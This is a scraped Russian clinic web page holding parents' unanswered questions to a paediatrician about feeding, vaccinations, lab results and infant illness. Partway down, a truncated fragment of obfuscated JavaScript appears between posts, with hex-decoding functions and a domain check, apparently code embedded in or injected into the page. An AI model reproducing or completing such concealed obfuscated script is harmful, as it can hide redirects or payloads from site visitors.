Вера / Консультация врача / Субботина Татьяна Артамоновна — задать вопрос

Субботина Татьяна Артамоновна — задать вопрос

Уважаемые посетители сайта и пациенты ООО «ЦСМ ВЕРА»!

Ответы врачей в разделе сайта «ВОПРОС — ОТВЕТ»

НОСЯТ исключительно ИНФОРМАЦИОННЫЙ характер,

НЕ ЯВЛЯЮТСЯ формой оказания медицинской помощи (медицинской услугой)!

Информация, размещенная в разделе сайта «ВОПРОС — ОТВЕТ», содержит сведения о возможных вариантах диагностики, лечения и профилактики интересуемых вас заболеваний, и не может быть использована для лечения конкретного пациента!

Медицинская помощь (медицинская услуга) оказывается только при личном посещении Центра на приёме у врача и по назначению врача.

Через сайт динамическое наблюдение за пациентом не осуществляется, коррекция лечения не проводится! Вопросы данной категории игнорируются.

НЕ ЗАНИМАЙТЕСЬ САМОЛЕЧЕНИЕМ!

СПАСИБО ЗА ПОНИМАНИЕ!

Денис — 12 марта 2016 #

Подскажите пожалуйста со скольки месяцев нужно водить прикорм ребёнку

Гульнур — 12 марта 2016 #

Добрый день. У моей дочки ногтевая пластина на пальцах рук и ног уплотняется. Ходили к дерматологу взяли анализ, и выявили грибок кандида. Второй анализ показал, что нет роста этого грибка. Дисбактериоза нет. Дерматолог отправил нас к своему участковому педиатру. Педиатр незнает что дальше делать, при мне начала искать ответ в интернете и назначила Аивит и Хилак форте. Из-за чего это может быть,

наталья — 12 марта 2016 #

Здравствуйте. Мне назначили принимать утрожестан внутрь. Малыш на гв. Ребенку 1 год 2 месяца. Ночью обязательно грудь. Недавно на теле у малыша выступили небольшие волдырики розового цвета. Может ли это быть аллергией на этот препарат. Вроде в интернете пишут, что он безопасен. Или прекращать гв. Спасибо.

Артем — 12 марта 2016 #

Здравствуйте. помогите пожалуйста советом. Мне 17 лет. 30-го августа будет 18. мой рост 175… У моих родителей у мамы 156. а у отца 176. Подскажите пожалуйста. могу ли я как-то достичь роста 185 см?

Света — 11 марта 2016 #

Здравствуйте. Моей дочке скоро два месяца. Сейчас прописали антибиотик. Даю по схеме в 7-15-23 часа. Сегодня вместо 15.00 дала в 16.00. Когда теперь давать следующую дозу? В 23 или в 24.00? Спасибо.

Наталья — 11 марта 2016 #

Здравствуйте! Ребенку 3года, ходит в сад с 1.5лет, но постоянно болеет. 2-3дня и все: сопли, температура, кашель. В сад ходит с удовольствием, скучает когда не ходит. Если дома хоть несколько месяцев при этом гуляет, ходит в гости к другим детям-все замечательно ни соплинки! И витамины даем, и «для иммунитета «, и противовирусные для профилактики-толку нет, только в сад и все. Возможности не ходить нет и часты болезни тоже надоели. Подскажите как быть, может какие то прививки есть(по возрасту все делали)?

Анна — 11 марта 2016 #

Добрый день, мне очень рада консультация. Моему сыну 3 месяца, недавно сдали полный анализ кала и крови. Везде повышены лейкоциты. Наш педиатр говорит ничего страшного, пройдет. Лечения нет, я очень переживаю. И еще на голове постоянно высыпания в виде корочки, я уже вычесывала неоднократно и опять. Похоже на себорейный дерматит. Врач так-де говорит, что пойдет со временем. Ребенок в принципе весел, улыбается, но капризничает, в последнее время просыпается с плачем и ножки погибает, колики исключены.

Что делать? Спасибо большое. Можно ли выслать вам анализы?

Ольга — 11 марта 2016 #

Здравствуйте, хочу посоветоваться по поводу желтизны кожи ребенка и ее динамики….осенью этого года наш педиатр обратила внимание на изменение цвета кожи ребнка, сдали биохимию, весь билирубин в норме, железа в 2 раза ниже нормы и немного ниже показатели белка, гемоглобин 117,цп 0,79.сделали узи печени по моей инициативе, обнаружен истинный загиб желчного пузыря, поставили латентный дефицит железа, принимали мальтофер 3 мес, решила пересдать оак, гемоглобин 122,цп 0.8,эритроцитов 4,57,пока железо принимали посветлела, только перестали пернд сдачей оак опять желтая, морковь и все желтое отменили с самого начала…атопический дерматит чуть ли не с рождения…не знаю, что и делать…может на лямблиоз сдать?к каким врачам еще обратится?спасибо за ответ

Ольга — 10 марта 2016 #

Здравствуйте! Дочке 5,5 месяцев, часто мучились с коликами. Наш педиатр настаивает чтобы давать только овощи до 6 месяцев. Мы на искусственном вскармливании. После овощей она вся выкручивается, видимо животик болит. Можно ли давать что-то другое, кашу например безмолочную? Ведь овощи вместе с молоком и у взрослого вызовут неприятные ощущения.

Татьяна — 09 марта 2016 #

Добрый день!
Моему ребенку 1 год, 7 месяцев. Вот его график прививок:
18.12.2014- Пентаксим,
05.02.2015-Пентаксим,
24.03.2015-Пентаксим.

24 марта предстоит ревакцинация.
1)как я понимаю, надеяться на то, что появится Пентаксим или инфанрикс-не стоит?
2)как лучше поступить в нашем случае? ждать вакцин или сделать русскую АКДС? если ждать, то сколько можно?
3) если вообще пропустить эту ревакцинацию, то чем это грозит?
4) Если делать русскую АКДС, то как быть с полиомиелитом?
5) Если все-таки найдем пентаксим, то ХИБ уже делать не нужно будет?
6) Через какое время после АКДС можно делать пневмоккоковую прививку?

спасибо огромное! Очень переживаю по этому вопросу. Ребенок здоровый, но на последнюю прививку среагировал высокой температурой.

Гульнара — 08 марта 2016 #

Здраствуйте, мы сделали анализ мочи по сулковичу -он показал 3 балла хотелось бы понять значение, нам 8 месяцев

Вероника — 08 марта 2016 #

здравствуйте. У меня грудничек, скоро месяц ему. дома гриппуют, боюсь чтоб его не заразили. подскажите противовирусный препарат для поддержки иммунитета. заранее спасибо

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=«»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «vera-72.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e

Ольга — 05 марта 2016 #

Добрый вечер, подскажите пожалуйста! Ребёнка оформляю в садик, пришёл клинический анализ крови и они таковы, ребёнку 15 марта будет три года! Лимфоциты — повышены, нийтрофилы понижены, сегментоядерные нийтрофилы тоже понижены! Заранее спасибо!

3.80 — 4.80 млн/мкл MCV (ср. объем эритр.) 82.3 фл 73.0 — 85.0 фл RDW (шир. распред. эритр) 12.6% 11.6 — 14.8% MCH (ср. содержание Hb) 27.9 пг 22.0 — 30.0 пг МСHС (ср. конц. Hb в эр.) 33.8 г/дл 32.0 — 38.0 г/дл Тромбоциты 318 тыс/мкл 189 — 394 тыс/мкл Лейкоциты 7.1 тыс/мкл 5.5 — 15.5 тыс/мкл Палочкоядерные нейтрофилы 1% 1 — 6% Сегментоядерные нейтрофилы 20% 32 — 55% Нейтрофилы (общ.число) 21% 33.0 — 61.0% Лимфоциты 68% 33.0 — 55.0% Моноциты 7% 3.0 — 9.0% Эозинофилы 4% 1.0 — 6.0% Базофилы 0% < 1.0

Виктория — 04 марта 2016 #

Здравствуйте скажите пожалуйста у меня сыну 4 месяца он начинает молиться. Можно ли его сажать?

Екатерина — 04 марта 2016 #

Здравствуйте подскажите пожалуйста какие ингаляции можно делать детям 3 мес.,и 4года в компрессором ингаляторе

Елена — 03 марта 2016 #

Добрый вечер. Моему ребёнку 7,5 месяцев. Грудное вскармливание. Прививки делали только в роддоме от таберкулеза и гепатита B. Невролог в 3 мес дала отвод на плановые прививки, потом дала добро.на сегодняшний день причина отсутствия прививок только в одном-педиатру не нравится общий анализ мочи, анализ крови хороший. Сдали повторно анализ мочи по ничепоренко-хороший, в анализе мочи на стерильность обнаружили микроб энтеробактер. Назначили лечение- супракс суспензия 2 раза в день по одной целой две десятых мл. 5 дней.

ира — 03 марта 2016 #

По поводу прививок:

Дочери сделали гепатит в прививку в роддоме и еще одну в 6 недель. Следующая в 10 недель (совместно с другими плановыми — акдс, менингит и т. д.).

Медсестра в клинике сказала что после гепатитной прививки нужно ждать 4 недели до других. Но тем не менее в 10 недель назначила все включая гепатиную.

На днях пришел вызов в ьольницу на прививку бцж. Медсестра в клинике советует ждать тк еще не прошло 4 недель с гепатитной прививки. А медсестра в больнице говорит что ждать не надо и реакции не будет.

Непонятно вообще ничего. Если ждать по 4 недели то бцж мы не получим до 4х месяцев ребенку. Не поздно ли это будет?

И что это за реакции такие ведь делают акдс и менингиь и бцж вместе не боясь реакции. Или это только гепатитная такая особенная прививка?

Что делать?

Анастасия — 03 марта 2016 #

Ребенку 3 года температура 38,5 ее сбиваешь она повышается также панос и рвота.

Елизавета — 02 марта 2016 #

Здравствуйте! Мой ребенок с 2,5 месяцев самостоятельно не какает. Сейчас ему уже 4,5 месяца. На протяжении этого времени я постоянно помогаю ему (ставлю свечи с глицерином или клизмочки микролакс). Две недели назад ввели прикорм овощами (кабачок, брокколи), в овощи добавляю растительное не рафинированное масло (на 100г овощей чайную ложку масла). Врач сказала принимать Дюфалак 2,5 мл 2 раза в день, утром и вечером. Принимаем почти уже месяц эффекта ноль((. Ввели чернослив из баночки, сегодня уже 4 день, не дейсивует. Только мне кажется животик стал болеть, капризничает. Подскажите пожалуйста что делать???

Инна — 01 марта 2016 #

Добрый вечер! Ребенку 1.6 ходили на прививку

Дали капельки в рот от полиомиелита и я совсем выпустила из головы что после них нельзя ни пить ни есть и дала ребенку иммунеле милил.20 где то через 30 минут после вакцины. Нужно ли еще раз делать или ничего страшного?

Добавить сообщение:

Отправлая сообщение вы соглашаетесь с условиями соглашения на обработку персональных данных.

Имя: *
Email: *
Сообщение: *
Введите код: *
  captcha Обновить
* — поля обязательные для заполнения.
 
Новости
25.12.2017

Уважаемые коллеги! От всего сердца поздравляем вас с победой в Конкурсе Правительства Тюменской области «Лучшие товары и услуги Тюменской области 2017 года» и присуждением звания Лауреата Конкурса в номинации «Медицинские услуги населению»!

24.12.2017

Уважаемые пациенты!

Расписание работы Центра Семейной Медицины ВЕРА в новогодние дни